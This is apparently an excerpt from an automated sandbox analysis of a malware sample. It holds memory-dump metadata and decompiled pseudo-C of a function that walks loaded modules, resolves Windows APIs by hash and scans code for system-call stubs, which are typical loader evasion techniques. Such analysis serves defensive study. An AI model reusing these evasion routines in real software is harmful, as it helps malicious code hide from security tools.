                                                                                                                                                  0x6e9b98c2
                                                                                                                                                  0x6e9b98c9
                                                                                                                                                  0x6e9b9899
                                                                                                                                                  0x6e9b989c
                                                                                                                                                  0x6e9b989e
                                                                                                                                                  0x6e9b98a2
                                                                                                                                                  0x6e9b98ac
                                                                                                                                                  0x6e9b98b2
                                                                                                                                                  0x6e9b98b2
                                                                                                                                                  0x6e9b989c
                                                                                                                                                  0x6e9b9897
                                                                                                                                                  0x6e9b98e7
                                                                                                                                                  0x6e9b98e7
                                                                                                                                                  0x6e9b9900
                                                                                                                                                  0x6e9b9900
                                                                                                                                                  0x6e9b9906
                                                                                                                                                  0x6e9b990b
                                                                                                                                                  0x6e9b9965
                                                                                                                                                  0x6e9b996a
                                                                                                                                                  0x6e9b99a9
                                                                                                                                                  0x6e9b99ae
                                                                                                                                                  0x6e9b99b0
                                                                                                                                                  0x6e9b99b4
                                                                                                                                                  0x6e9b99b7
                                                                                                                                                  0x6e9b99ba
                                                                                                                                                  0x6e9b99bc
                                                                                                                                                  0x6e9b99bd
                                                                                                                                                  0x6e9b99bd
                                                                                                                                                  0x6e9b99c2
                                                                                                                                                  0x6e9b99e0
                                                                                                                                                  0x6e9b99e2
                                                                                                                                                  0x6e9b99e6
                                                                                                                                                  0x6e9b99ec
                                                                                                                                                  0x6e9b99ef
                                                                                                                                                  0x6e9b99f1
                                                                                                                                                  0x6e9b99f2
                                                                                                                                                  0x6e9b99f2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b99c4
                                                                                                                                                  0x6e9b99c4
                                                                                                                                                  0x6e9b99c4
                                                                                                                                                  0x6e9b99c8
                                                                                                                                                  0x6e9b99ce
                                                                                                                                                  0x6e9b99d1
                                                                                                                                                  0x6e9b99d3
                                                                                                                                                  0x6e9b99d6
                                                                                                                                                  0x6e9b99f5
                                                                                                                                                  0x6e9b99f5
                                                                                                                                                  0x6e9b99fc
                                                                                                                                                  0x6e9b9a16
                                                                                                                                                  0x6e9b99fe
                                                                                                                                                  0x6e9b99fe
                                                                                                                                                  0x6e9b9a0a
                                                                                                                                                  0x6e9b9a0b
                                                                                                                                                  0x6e9b9a0e
                                                                                                                                                  0x6e9b9a0e
                                                                                                                                                  0x6e9b9a24
                                                                                                                                                  0x6e9b9a24
                                                                                                                                                  0x6e9b99c2
                                                                                                                                                  0x6e9b996f
                                                                                                                                                  0x6e9b997d
                                                                                                                                                  0x6e9b9995
                                                                                                                                                  0x6e9b9999
                                                                                                                                                  0x6e9b999c
                                                                                                                                                  0x6e9b99a2
                                                                                                                                                  0x6e9b99a6
                                                                                                                                                  0x6e9b99a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b99a6
                                                                                                                                                  0x6e9b997f
                                                                                                                                                  0x6e9b9983
                                                                                                                                                  0x6e9b9989
                                                                                                                                                  0x6e9b9989
                                                                                                                                                  0x6e9b998f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b998f
                                                                                                                                                  0x6e9b9971
                                                                                                                                                  0x6e9b9975
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9975
                                                                                                                                                  0x6e9b990f
                                                                                                                                                  0x6e9b993b
                                                                                                                                                  0x6e9b9953
                                                                                                                                                  0x6e9b9957
                                                                                                                                                  0x6e9b995a
                                                                                                                                                  0x6e9b995d
                                                                                                                                                  0x6e9b995f
                                                                                                                                                  0x6e9b9962
                                                                                                                                                  0x6e9b993d
                                                                                                                                                  0x6e9b993d
                                                                                                                                                  0x6e9b9941
                                                                                                                                                  0x6e9b9944
                                                                                                                                                  0x6e9b9947
                                                                                                                                                  0x6e9b994a
                                                                                                                                                  0x6e9b994d
                                                                                                                                                  0x6e9b994d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b993b
                                                                                                                                                  0x6e9b9915
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b991b
                                                                                                                                                  0x6e9b991f
                                                                                                                                                  0x6e9b9925
                                                                                                                                                  0x6e9b9928
                                                                                                                                                  0x6e9b992b
                                                                                                                                                  0x6e9b992e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b992e
                                                                                                                                                  0x6e9b97a6
                                                                                                                                                  0x6e9b97aa
                                                                                                                                                  0x6e9b97b0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b97b0
                                                                                                                                                  0x6e9b96e8
                                                                                                                                                  0x6e9b96fa
                                                                                                                                                  0x6e9b96ff
                                                                                                                                                  0x6e9b976a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9771
                                                                                                                                                  0x6e9b9797
                                                                                                                                                  0x6e9b979b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b977a
                                                                                                                                                  0x6e9b977f
                                                                                                                                                  0x6e9b9793
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b9795
                                                                                                                                                  0x6e9b9786
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b978b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b978d
                                                                                                                                                  0x00000000

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
                                                                                                                                                  • Instruction ID: 38ab198c6f049804df4d046819a6158f1e940a3e2c743c5feeff2300b8492087
                                                                                                                                                  • Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
                                                                                                                                                  • Instruction Fuzzy Hash: E0229D3141839ACBD754CF99C4A136BBBE5BFA6300F10886EE8E54B291D335D985CF92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                  			E6E9B143C(signed char __eax, signed char __edx) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				signed char _t231;
                                                                                                                                                  				signed char _t233;
                                                                                                                                                  				signed char _t238;
                                                                                                                                                  				intOrPtr _t241;
                                                                                                                                                  				void* _t246;
                                                                                                                                                  				signed char _t257;
                                                                                                                                                  				signed char _t261;
                                                                                                                                                  				signed char _t269;
                                                                                                                                                  				signed char _t270;
                                                                                                                                                  				signed char _t277;
                                                                                                                                                  				signed int _t279;
                                                                                                                                                  				signed char _t280;
                                                                                                                                                  				signed char _t281;
                                                                                                                                                  				void* _t289;
                                                                                                                                                  				void* _t290;
                                                                                                                                                  				signed char _t315;
                                                                                                                                                  				void* _t319;
                                                                                                                                                  				signed char _t334;
                                                                                                                                                  				signed char _t336;
                                                                                                                                                  				void* _t341;
                                                                                                                                                  				void* _t347;
                                                                                                                                                  				intOrPtr _t352;
                                                                                                                                                  				signed char _t354;
                                                                                                                                                  				signed char _t363;
                                                                                                                                                  				void* _t369;
                                                                                                                                                  				intOrPtr _t371;
                                                                                                                                                  				signed short* _t373;
                                                                                                                                                  				void _t375;
                                                                                                                                                  				void* _t379;
                                                                                                                                                  				signed int _t381;
                                                                                                                                                  				void* _t382;
                                                                                                                                                  				void** _t383;
                                                                                                                                                  				void* _t384;
                                                                                                                                                  				char* _t387;
                                                                                                                                                  				signed char _t395;
                                                                                                                                                  				signed char* _t396;
                                                                                                                                                  				intOrPtr _t400;
                                                                                                                                                  				signed int _t451;
                                                                                                                                                  				intOrPtr* _t455;
                                                                                                                                                  				signed char _t456;
                                                                                                                                                  				signed int _t462;
                                                                                                                                                  				void* _t467;
                                                                                                                                                  				signed char _t471;
                                                                                                                                                  				signed char _t472;
                                                                                                                                                  				signed char* _t477;
                                                                                                                                                  				signed char _t487;
                                                                                                                                                  				signed int _t490;
                                                                                                                                                  				intOrPtr* _t496;
                                                                                                                                                  				intOrPtr _t497;
                                                                                                                                                  				signed char _t498;
                                                                                                                                                  				signed char _t499;
                                                                                                                                                  				intOrPtr _t500;
                                                                                                                                                  				signed char _t508;
                                                                                                                                                  				intOrPtr _t510;
                                                                                                                                                  				void* _t513;
                                                                                                                                                  				signed char _t519;
                                                                                                                                                  				intOrPtr* _t524;
                                                                                                                                                  				signed char _t525;
                                                                                                                                                  				signed char _t526;
                                                                                                                                                  				signed char _t527;
                                                                                                                                                  				signed char _t529;
                                                                                                                                                  				signed char* _t531;
                                                                                                                                                  				signed char _t532;
                                                                                                                                                  				void* _t533;
                                                                                                                                                  				void* _t534;
                                                                                                                                                  				signed char* _t535;
                                                                                                                                                  
                                                                                                                                                  				_t535[0x54] = __edx;
                                                                                                                                                  				 *_t535 = __eax;
                                                                                                                                                  				_t231 = E6E9B0304(__edx, 1);
                                                                                                                                                  				if(_t231 != 0) {
                                                                                                                                                  					return _t231;
                                                                                                                                                  				}
                                                                                                                                                  				_t535[0x2c] = _t231;
                                                                                                                                                  				if( *0x6e9bd208 == 0 ||  *0x6e9bd2e4 != 0) {
                                                                                                                                                  					L44:
                                                                                                                                                  					if( *_t535 == 0) {
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  					_t233 =  *_t535;
                                                                                                                                                  					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
                                                                                                                                                  					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
                                                                                                                                                  					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
                                                                                                                                                  					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
                                                                                                                                                  					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
                                                                                                                                                  					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
                                                                                                                                                  						L77:
                                                                                                                                                  						 *_t535 = 0;
                                                                                                                                                  						_t535[0x2c] = 0;
                                                                                                                                                  						L78:
                                                                                                                                                  						return  *_t535;
                                                                                                                                                  					}
                                                                                                                                                  					_t535[0x12c] = 0;
                                                                                                                                                  					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
                                                                                                                                                  					do {
                                                                                                                                                  						_t467 = 0;
                                                                                                                                                  						_t387 =  *_t524 +  *_t535;
                                                                                                                                                  						_t238 =  *_t387;
                                                                                                                                                  						_t535[0x58] = _t238;
                                                                                                                                                  						if(_t238 == 0) {
                                                                                                                                                  							L49:
                                                                                                                                                  							if(E6E9B4FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
                                                                                                                                                  								_t535[0x2c] = 0;
                                                                                                                                                  								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
                                                                                                                                                  								__eflags = _t241 - _t510;
                                                                                                                                                  								if(_t241 < _t510) {
                                                                                                                                                  									L57:
                                                                                                                                                  									_t471 =  *_t535 + _t241;
                                                                                                                                                  									__eflags = _t471;
                                                                                                                                                  									 *_t535 = _t471;
                                                                                                                                                  									_t535[0x2c] = _t471;
                                                                                                                                                  									L58:
                                                                                                                                                  									__eflags =  *_t535;
                                                                                                                                                  									if( *_t535 == 0) {
                                                                                                                                                  										goto L78;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *0x6e9bd2f0 |  *0x6e9bd2f1;
                                                                                                                                                  									if(( *0x6e9bd2f0 |  *0x6e9bd2f1) == 0) {
                                                                                                                                                  										_t525 =  *0x6e9bd208; // 0x12f1340
                                                                                                                                                  										__eflags = _t525;
                                                                                                                                                  										if(_t525 == 0) {
                                                                                                                                                  											 *0x6e9bd2f0 = 1;
                                                                                                                                                  											_t526 = E6E9B361C(0x1c4);
                                                                                                                                                  											__eflags = _t526;
                                                                                                                                                  											if(_t526 == 0) {
                                                                                                                                                  												_t526 = 0;
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  											} else {
                                                                                                                                                  												E6E9B1C30(_t526, 0x10);
                                                                                                                                                  												 *(_t526 + 0x1c0) = 0;
                                                                                                                                                  											}
                                                                                                                                                  											 *0x6e9bd208 = _t526;
                                                                                                                                                  											 *0x6e9bd2f0 = 0;
                                                                                                                                                  											L68:
                                                                                                                                                  											_t246 = 0;
                                                                                                                                                  											_t472 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											while(1) {
                                                                                                                                                  												__eflags =  *(_t472 + _t526 + 8);
                                                                                                                                                  												if( *(_t472 + _t526 + 8) == 0) {
                                                                                                                                                  													break;
                                                                                                                                                  												}
                                                                                                                                                  												_t246 = _t246 + 1;
                                                                                                                                                  												_t472 = _t472 + 0x1c;
                                                                                                                                                  												__eflags = _t246 - 0x10;
                                                                                                                                                  												if(_t246 < 0x10) {
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												_t375 = E6E9B361C(0x1c4);
                                                                                                                                                  												__eflags = _t375;
                                                                                                                                                  												if(_t375 == 0) {
                                                                                                                                                  													_t375 = 0;
                                                                                                                                                  													__eflags = 0;
                                                                                                                                                  												} else {
                                                                                                                                                  													E6E9B1C30(_t375, 0x10);
                                                                                                                                                  													 *(_t375 + 0x1c0) = 0;
                                                                                                                                                  												}
                                                                                                                                                  												 *(_t375 + 0x14) = _t535[0x2c];
                                                                                                                                                  												E6E9ADFC0(_t375,  &(_t535[0x58]));
                                                                                                                                                  												 *(_t375 + 8) = _t535[0x54];
                                                                                                                                                  												 *(_t526 + 0x1c0) = _t375;
                                                                                                                                                  												L76:
                                                                                                                                                  												 *_t535 = _t535[0x2c];
                                                                                                                                                  												goto L78;
                                                                                                                                                  											}
                                                                                                                                                  											_t527 = _t526 + _t472;
                                                                                                                                                  											__eflags = _t527;
                                                                                                                                                  											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
                                                                                                                                                  											E6E9ADFC0(_t527,  &(_t535[0x58]));
                                                                                                                                                  											 *(_t527 + 8) = _t535[0x54];
                                                                                                                                                  											goto L76;
                                                                                                                                                  										}
                                                                                                                                                  										_t257 =  *(_t525 + 0x1c0);
                                                                                                                                                  										while(1) {
                                                                                                                                                  											__eflags = _t257;
                                                                                                                                                  											if(_t257 == 0) {
                                                                                                                                                  												goto L68;
                                                                                                                                                  											}
                                                                                                                                                  											_t526 = _t257;
                                                                                                                                                  											_t257 =  *(_t257 + 0x1c0);
                                                                                                                                                  										}
                                                                                                                                                  										goto L68;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t535[0x54] - 0x1c6ef387;
                                                                                                                                                  									if(_t535[0x54] == 0x1c6ef387) {
                                                                                                                                                  										 *0x6e9bd20c =  *_t535;
                                                                                                                                                  									} else {
                                                                                                                                                  										__eflags = _t535[0x54] - 0x45b68b68;
                                                                                                                                                  										if(_t535[0x54] == 0x45b68b68) {
                                                                                                                                                  											 *0x6e9bd210 =  *_t535;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L78;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t241 - _t535[0x130];
                                                                                                                                                  								if(_t241 >= _t535[0x130]) {
                                                                                                                                                  									goto L57;
                                                                                                                                                  								}
                                                                                                                                                  								_t535[0x130] =  &(_t535[0x58]);
                                                                                                                                                  								_t261 = E6E9AE8A8( &(_t535[0x58]), 0x7fffffff);
                                                                                                                                                  								_t477 =  &(_t535[0x12c]);
                                                                                                                                                  								 *_t477 = _t261;
                                                                                                                                                  								_t477[2] = _t261 + 1;
                                                                                                                                                  								_t395 = E6E9B306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
                                                                                                                                                  								__eflags = _t395;
                                                                                                                                                  								if(_t395 != 0) {
                                                                                                                                                  									_t202 =  &(_t535[0x12c]); // 0x100
                                                                                                                                                  									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
                                                                                                                                                  								}
                                                                                                                                                  								 *_t535 = _t535[0x2c];
                                                                                                                                                  								goto L58;
                                                                                                                                                  							}
                                                                                                                                                  							goto L50;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L48;
                                                                                                                                                  						}
                                                                                                                                                  						do {
                                                                                                                                                  							L48:
                                                                                                                                                  							_t467 = _t467 + 1;
                                                                                                                                                  							_t270 =  *((intOrPtr*)(_t467 + _t387));
                                                                                                                                                  							_t535[_t467 + 0x58] = _t270;
                                                                                                                                                  						} while (_t270 != 0);
                                                                                                                                                  						goto L49;
                                                                                                                                                  						L50:
                                                                                                                                                  						_t524 = _t524 + 4;
                                                                                                                                                  						_t396 =  &(_t535[0x12c]);
                                                                                                                                                  						_t373 =  &(_t373[1]);
                                                                                                                                                  						_t269 =  *_t396 + 1;
                                                                                                                                                  						 *_t396 = _t269;
                                                                                                                                                  					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
                                                                                                                                                  					goto L77;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t535[0x30] = 0;
                                                                                                                                                  					 *0x6e9bd2e4 = 1;
                                                                                                                                                  					E6E9AF584( &(_t535[0x38]), 0);
                                                                                                                                                  					E6E9AF584( &(_t535[0x168]), 0x1c);
                                                                                                                                                  					_t535[0x58] = E6E9AF4BC( &(_t535[0x168]), 0);
                                                                                                                                                  					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
                                                                                                                                                  					_t535[0x48] =  *(_t400 + 0xc);
                                                                                                                                                  					_t535[0x60] =  *(_t400 + 0x10);
                                                                                                                                                  					goto L5;
                                                                                                                                                  					L6:
                                                                                                                                                  					_t384 = 0;
                                                                                                                                                  					do {
                                                                                                                                                  						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
                                                                                                                                                  							goto L13;
                                                                                                                                                  						}
                                                                                                                                                  						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
                                                                                                                                                  						_t496 = E6E9B306C(0x60a28c5c, 0xe7942190, _t279, _t279);
                                                                                                                                                  						if(_t496 == 0) {
                                                                                                                                                  							L10:
                                                                                                                                                  							_t456 = _t535[0x50];
                                                                                                                                                  							_t497 =  *((intOrPtr*)(_t529 + 0xc));
                                                                                                                                                  							_t498 = _t497 + _t456;
                                                                                                                                                  							_t500 =  *((intOrPtr*)(_t529 + 8));
                                                                                                                                                  							_t535[0x28] = _t498;
                                                                                                                                                  							_t499 = _t498 + _t500;
                                                                                                                                                  							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
                                                                                                                                                  							_t535[0x24] = _t529;
                                                                                                                                                  							_t535[0x20] =  *(_t535[0x48] + 0x30);
                                                                                                                                                  							if((_t499 & 0x00000003) == 0) {
                                                                                                                                                  								L12:
                                                                                                                                                  								_t535[0x1c] = _t363;
                                                                                                                                                  								_t535[0x18] = _t499;
                                                                                                                                                  								E6E9AF828( &(_t535[0xc]), E6E9AF4CC( &(_t535[8])) + 0x14);
                                                                                                                                                  								_t369 = E6E9AF4BC( &(_t535[0xc]), E6E9AF4CC( &(_t535[8])) + 0xffffffec);
                                                                                                                                                  								_t462 = 5;
                                                                                                                                                  								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
                                                                                                                                                  								_t535 =  &(_t535[0xc]);
                                                                                                                                                  								_t535[4] = _t535[4] + 1;
                                                                                                                                                  								goto L13;
                                                                                                                                                  							} else {
                                                                                                                                                  								goto L11;
                                                                                                                                                  							}
                                                                                                                                                  							do {
                                                                                                                                                  								L11:
                                                                                                                                                  								_t499 = _t499 + 1;
                                                                                                                                                  								_t363 = _t363 - 1;
                                                                                                                                                  							} while ((_t499 & 0x00000003) != 0);
                                                                                                                                                  							goto L12;
                                                                                                                                                  						}
                                                                                                                                                  						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
                                                                                                                                                  						if(0 < 0) {
                                                                                                                                                  							goto L13;
                                                                                                                                                  						}
                                                                                                                                                  						goto L10;
                                                                                                                                                  						L13:
                                                                                                                                                  						_t384 = _t384 + 1;
                                                                                                                                                  						_t529 = _t529 + 0x28;
                                                                                                                                                  					} while (_t384 < _t535[0x5c]);
                                                                                                                                                  					L14:
                                                                                                                                                  					_t280 = _t535[4];
                                                                                                                                                  					_t535[0x44] = _t280;
                                                                                                                                                  					if(_t280 <= 1) {
                                                                                                                                                  						L21:
                                                                                                                                                  						if(_t535[0x44] <= 0) {
                                                                                                                                                  							L24:
                                                                                                                                                  							_t281 = _t535[0x48];
                                                                                                                                                  							_t556 = _t281 - _t535[0x60];
                                                                                                                                                  							if(_t281 != _t535[0x60]) {
                                                                                                                                                  								_t535[0x48] =  *_t281;
                                                                                                                                                  								E6E9AF654( &(_t535[8]));
                                                                                                                                                  								L5:
                                                                                                                                                  								_t277 =  *(_t535[0x48] + 0x18);
                                                                                                                                                  								_t535[0x50] = _t277;
                                                                                                                                                  								_t535[4] = 0;
                                                                                                                                                  								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
                                                                                                                                                  								E6E9AF584( &(_t535[0xc]), 0);
                                                                                                                                                  								_t279 =  *(_t379 + 6) & 0x0000ffff;
                                                                                                                                                  								_t535[0x5c] = _t279;
                                                                                                                                                  								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                  								if(_t279 <= 0) {
                                                                                                                                                  									goto L14;
                                                                                                                                                  								}
                                                                                                                                                  								goto L6;
                                                                                                                                                  							}
                                                                                                                                                  							E6E9AF654( &(_t535[8]));
                                                                                                                                                  							E6E9AF654( &(_t535[0x164]));
                                                                                                                                                  							E6E9AF584( &(_t535[0x48]), 0);
                                                                                                                                                  							_t535[0x18] = 0;
                                                                                                                                                  							E6E9AF584( &(_t535[0x20]), 0);
                                                                                                                                                  							_push(0x60a28c5c);
                                                                                                                                                  							_t289 = E6E9B1D34(0x60a28c5c);
                                                                                                                                                  							_t290 = E6E9B12EC( &(_t535[0x154]), _t517, _t556);
                                                                                                                                                  							_push(_t290);
                                                                                                                                                  							_push(_t290);
                                                                                                                                                  							E6E9B1C6C( &(_t535[0x164]), 0x60a28c5c);
                                                                                                                                                  							_t518 =  &(_t535[0x178]);
                                                                                                                                                  							E6E9AD014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
                                                                                                                                                  							_push(0x80);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							E6E9B5CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
                                                                                                                                                  							E6E9B5D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
                                                                                                                                                  							_push(_t289);
                                                                                                                                                  							E6E9B8E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
                                                                                                                                                  							E6E9AF654( &(_t535[0x180]));
                                                                                                                                                  							_t557 = _t535[0x114];
                                                                                                                                                  							if(_t535[0x114] != 0) {
                                                                                                                                                  								E6E9ABB44( &(_t535[0x110]));
                                                                                                                                                  							}
                                                                                                                                                  							E6E9ACFDC( &(_t535[0x104]));
                                                                                                                                                  							E6E9ACFDC(_t518);
                                                                                                                                                  							E6E9ACFDC( &(_t535[0x15c]));
                                                                                                                                                  							E6E9ACFDC( &(_t535[0x154]));
                                                                                                                                                  							E6E9B90EC( &(_t535[0xdc]), 0xffffffff);
                                                                                                                                                  							_t535[0x118] = _t535[0xf0];
                                                                                                                                                  							E6E9AF618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
                                                                                                                                                  							_push(1);
                                                                                                                                                  							E6E9B90B0( &(_t535[0x11c]));
                                                                                                                                                  							_t381 = 0;
                                                                                                                                                  							_t535[0x64] = 0;
                                                                                                                                                  							_t535[0x60] = 0;
                                                                                                                                                  							do {
                                                                                                                                                  								_t535[0x58] = E6E9AF4BC( &(_t535[0x38]), _t535[0x60]);
                                                                                                                                                  								_t535[0x70] = E6E9AF4CC( &(_t535[0x44]));
                                                                                                                                                  								_t519 =  *(0x6e9bbd40 + _t381 * 4);
                                                                                                                                                  								_t531 = E6E9B907C( &(_t535[0xf4]), _t519, _t519);
                                                                                                                                                  								if(_t531 == 0) {
                                                                                                                                                  									goto L42;
                                                                                                                                                  								}
                                                                                                                                                  								_t508 = E6E9B87E8( &(_t535[0x11c]), _t519,  *_t531);
                                                                                                                                                  								_t532 =  *_t531;
                                                                                                                                                  								while(_t532 ==  *_t508) {
                                                                                                                                                  									_t508 = _t508 + 8;
                                                                                                                                                  									__eflags = _t508;
                                                                                                                                                  								}
                                                                                                                                                  								_t315 =  *_t508;
                                                                                                                                                  								_t535[0x74] = _t315;
                                                                                                                                                  								_t535[0x78] = _t315 - _t532;
                                                                                                                                                  								if(_t381 != 0) {
                                                                                                                                                  									L38:
                                                                                                                                                  									_t535[0x68] = E6E9AF4CC( &(_t535[0x44]));
                                                                                                                                                  									_t535[0x6c] = _t519;
                                                                                                                                                  									E6E9AF4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
                                                                                                                                                  									_t319 = E6E9AF4CC( &(_t535[0x44]));
                                                                                                                                                  									_t487 = _t535[0x58];
                                                                                                                                                  									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
                                                                                                                                                  									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
                                                                                                                                                  										E6E9AF828( &(_t535[0x20]), E6E9AF4CC( &(_t535[0x1c])) + 8);
                                                                                                                                                  										E6E9AF4BC( &(_t535[0x20]), E6E9AF4CC( &(_t535[0x1c])) + 0xfffffff8);
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										_t535[0x18] = _t535[0x18] + 1;
                                                                                                                                                  										__eflags = _t381 - 0x1d;
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											_t228 =  &(_t535[0x44]); // 0x2c
                                                                                                                                                  											E6E9B317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
                                                                                                                                                  										}
                                                                                                                                                  										goto L42;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828( &(_t535[0x48]), _t535[0x70]);
                                                                                                                                                  									E6E9B317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
                                                                                                                                                  									E6E9AF840( &(_t535[0x44]), _t563);
                                                                                                                                                  									E6E9AF840( &(_t535[0x1c]), _t563);
                                                                                                                                                  									_t381 = _t381 - 1;
                                                                                                                                                  									_t334 = _t535[0x64] + 1;
                                                                                                                                                  									_t535[0x60] = _t535[0x60] + 0x14;
                                                                                                                                                  									_t535[0x18] = 0;
                                                                                                                                                  									_t535[0x64] = _t334;
                                                                                                                                                  									if(_t334 == _t535[0x30]) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									goto L42;
                                                                                                                                                  								}
                                                                                                                                                  								E6E9B913C( &(_t535[0x134]), _t519);
                                                                                                                                                  								_t535[0x5c] = _t532;
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t336 = _t535[0x5c];
                                                                                                                                                  									_t562 =  *_t336 - 0xb8;
                                                                                                                                                  									if( *_t336 == 0xb8) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t490 = _t535[0x5c] + E6E9B9104( &(_t535[0x138]), __eflags, _t535[0x74]);
                                                                                                                                                  									_t535[0x5c] = _t490;
                                                                                                                                                  									__eflags = _t490 -  *_t508;
                                                                                                                                                  									if(__eflags < 0) {
                                                                                                                                                  										continue;
                                                                                                                                                  									}
                                                                                                                                                  									L37:
                                                                                                                                                  									E6E9AF654( &(_t535[0x144]));
                                                                                                                                                  									E6E9AF654( &(_t535[0x134]));
                                                                                                                                                  									goto L38;
                                                                                                                                                  								}
                                                                                                                                                  								 *0x6e9bd2ec =  *((intOrPtr*)(_t336 + 1));
                                                                                                                                                  								goto L37;
                                                                                                                                                  								L42:
                                                                                                                                                  								_t381 = _t381 + 1;
                                                                                                                                                  							} while (_t381 < 0x1e);
                                                                                                                                                  							E6E9AF654( &(_t535[0x11c]));
                                                                                                                                                  							E6E9B8E68(_t381,  &(_t535[0xd8]));
                                                                                                                                                  							E6E9AF654( &(_t535[0x1c]));
                                                                                                                                                  							E6E9AF654( &(_t535[0x44]));
                                                                                                                                                  							E6E9AF654( &(_t535[0x34]));
                                                                                                                                                  							goto L44;
                                                                                                                                                  						}
                                                                                                                                                  						_t533 = 0;
                                                                                                                                                  						_t382 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_t341 = E6E9AF4BC( &(_t535[0xc]), _t382);
                                                                                                                                                  							_t517 = _t341;
                                                                                                                                                  							E6E9AF828( &(_t535[0x38]), E6E9AF4CC( &(_t535[0x34])) + 0x14);
                                                                                                                                                  							_t347 = E6E9AF4BC( &(_t535[0x38]), E6E9AF4CC( &(_t535[0x34])) + 0xffffffec);
                                                                                                                                                  							_t451 = 5;
